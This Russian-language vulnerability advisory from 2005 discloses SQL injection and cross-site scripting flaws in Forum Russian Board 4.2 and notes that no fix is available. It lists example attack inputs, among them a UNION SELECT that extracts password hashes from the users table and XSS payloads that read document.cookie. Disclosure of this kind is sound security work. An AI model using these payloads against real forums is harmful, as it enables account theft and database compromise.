Security Lab

SQL-инъекция и межсайтовый скриптинг в Forum Russian Board

Дата публикации:24.06.2005
Всего просмотров:1575
Опасность:
Средняя
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
Неавторизованное изменение данных
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Forum Russian Board 4.x
Уязвимые версии: Forum Russian Board 4.2

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.

1. SQL-инъекция возможна из-за недостаточной фильтрации входных данных в различных сценариях. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Примеры:

menu_header.php?table_sql[users]=[SQL_CODE]
set.php?name_ig_array[1]=' OR 1=1/*
reply_in.php?subject_reply=1&name_reply=1&message=1&email_reply=1'&t=1
new.php?m_id=1&t=1&mid=1&cat=3&name_ig_array1[1]=666' union select password,password from frb_users /*

2. Межсайтовый скриптинг возможен из-за недостаточной обработки HTML тегов. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

menu_footer.php?rows_all=><script>alert("XSS");</script>
menu_tema.php?width_forum=><script>alert("XSS");</script>
reply.php?m_id=1&t=1&mid=1&cat=3&name_ig_array[1]="><script>alert("XSS");</script>
[img]wink.gif onerror=javascript:alert(document.cookie);[/img]

URL производителя: frb.ru

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Multiple vulnerabilities in Forum Russian Board